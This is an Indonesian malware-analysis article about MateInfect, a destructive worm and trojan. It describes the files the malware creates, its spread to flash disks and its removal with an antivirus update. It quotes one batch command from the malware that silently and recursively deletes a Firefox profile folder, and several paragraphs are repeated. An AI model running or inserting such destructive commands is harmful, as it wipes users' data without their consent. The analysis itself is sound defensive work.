Virus : MateInfect-Malware Khusus untuk Para Koruptor
MateInfect. Gambar di atas adalah pesan yang disampaikan oleh MateInfect. Mungkin masih ingat dengan UltraSurf, yang memformat setiap local drive yang ada kecuali drive system-nya. MateInfect justru merupakan kebalikan dari UltraSurf karena kerusakan yang dihasilkan hampir tidak bisa diperbaiki, karena terhapusnya hampir secara keseluruhan file yang terdapat pada drive C:\ dan seolah mengizinkan file host maupun companionnya dihapus seiring dengan terhapusnya seluruh file system Windows.
A. Info File
Nama Malware : MateInfect
Asal : Bandung, Indonesia
Ukuran File : 221 KB (227,092 bytes)
Packer : ~
Pemrograman : Microsoft Visual C++
Icon : Malware Icon
Tipe : Worm, Trojan
B. About Malware
Sampelnya pertama kami dapatkan dari user yang IP-nya berasal dari kota Bandung. Sekilas seperti sebuah aplikasi biasa, namun hasil yang diakibatkan sangat diluar dugaan. Terhitung cukup jarang malware yang dibuat menggunakan C++ dan berasal dari Indonesia belakangan ini. Namun seperti biasa, ciri khas dari malware lokal adalah adanya pesan dari sang pembuat virus. Bisa dikatakan bahwa MateInfect hadir dengan membawa tema yang mengandung unsur politik seperti yang terlihat pada gambar di atas.
Sampelnya pertama kami dapatkan dari user yang IP-nya berasal dari kota Bandung. Sekilas seperti sebuah aplikasi biasa, namun hasil yang diakibatkan sangat diluar dugaan. Terhitung cukup jarang malware yang dibuat menggunakan C++ dan berasal dari Indonesia belakangan ini. Namun seperti biasa, ciri khas dari malware lokal adalah adanya pesan dari sang pembuat virus. Bisa dikatakan bahwa MateInfect hadir dengan membawa tema yang mengandung unsur politik seperti yang terlihat pada gambar di atas.
Seperti yang sudah dijelaskan sebelumnya, MateInfect menjalankan payload yang terbilang tidak wajar. File Windows baik itu *. exe ataupun *.dll, dihapus secara total. Dan akibatnya tidak diragukan lagi, sudah tentu akan mengakibatkan komputer tidak bisa melakukan proses booting ke sistem operasi Windows. Seperti pada gambar di bawah ini.
Namanya diambil dari companionnya yang tidak ditemukan keberadaannya, kemungkinan file tersebut memang tidak tercipta.
C. Companion/File yang dibuat
Sebelum memulai aksinya, MateInfect membuat beberapa companion yang cukup banyak keberadaannya.
Sebelum memulai aksinya, MateInfect membuat beberapa companion yang cukup banyak keberadaannya.
• MateInfect.bat
File bat dengan nama history.bat ini tidak akan muncul jika user sengaja melakukan analisa menggunakan Sandboxie. Dan dengan terpaksa harus dilakukan pengetesan secara langsung dengan cara mengaktifkan malware ini.
File bat dengan nama history.bat ini tidak akan muncul jika user sengaja melakukan analisa menggunakan Sandboxie. Dan dengan terpaksa harus dilakukan pengetesan secara langsung dengan cara mengaktifkan malware ini.
• MateInfect.html
Pesan yang tergambarkan pada file HTML yang dibuat di folder system32 dengan nama HukumanBuatKoruptor.html.
Pesan yang tergambarkan pada file HTML yang dibuat di folder system32 dengan nama HukumanBuatKoruptor.html.
• MateInfect.lnk.A & MateInfect.lnk.B
Shortcut juga dibuat agar payload yang belum dilakukan oleh malware tetap dijalankan. Seperti salah satu shortut yang terdapat di folder startup dengan nama WinCleaner.lnk.
Shortcut juga dibuat agar payload yang belum dilakukan oleh malware tetap dijalankan. Seperti salah satu shortut yang terdapat di folder startup dengan nama WinCleaner.lnk.
• MateInfect.vbs.A & MateInfect.vbs.B
File VBS yang dibuat terdiri dari 2 buah fungsi. Pada variant A, berfungsi utuk mengeksekusi host dengan nama sMaD.jp dan file html yang dibuat. Sedangkan variant B memiliki peran sebagai pembuat file shortcut pada folder startup.
File VBS yang dibuat terdiri dari 2 buah fungsi. Pada variant A, berfungsi utuk mengeksekusi host dengan nama sMaD.jp dan file html yang dibuat. Sedangkan variant B memiliki peran sebagai pembuat file shortcut pada folder startup.
• MateInfect.zip.A, MateInfect.zip.B & MateInfect.zip.C
Berisi host dari MateInfect yang kemudian di ekstrak dan dieksekusi.
Berisi host dari MateInfect yang kemudian di ekstrak dan dieksekusi.
D. Hasil Infeksi
Jika pada saat komputer korban terdapat flash disk yang sedang terhubung, MateInfect akan membuat folder RECYCLER yang didalamnya terdapat 2 buah folder yang tidak bisa dihapus secara manual.
Jika pada saat komputer korban terdapat flash disk yang sedang terhubung, MateInfect akan membuat folder RECYCLER yang didalamnya terdapat 2 buah folder yang tidak bisa dihapus secara manual.
Selain itu, tanpa disadari seluruh file yang terdapat di drive [C:\] satu persatu dihapus oleh MateInfect dengan perintah seperti ini:
1 2 3 4 5 6 | @echo offC:cd \cd "%USERPROFILE%\Application Data\Mozilla\Firefox\Profiles\*.default"del *.* /s /q /f |
E. Pembersihan
PAda PCMAV 6.0 update build terbaru ini telah dapat mengenali dan membasmi MateInfect.
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 6.0 Update Build2 telah hadir dengan penambahan 58 pengenal varian virus baru. Bagi Anda pengguna PCMAV 6.0, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt. Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.
Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui link ini:
Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.
Sumber : Virus Indonesia
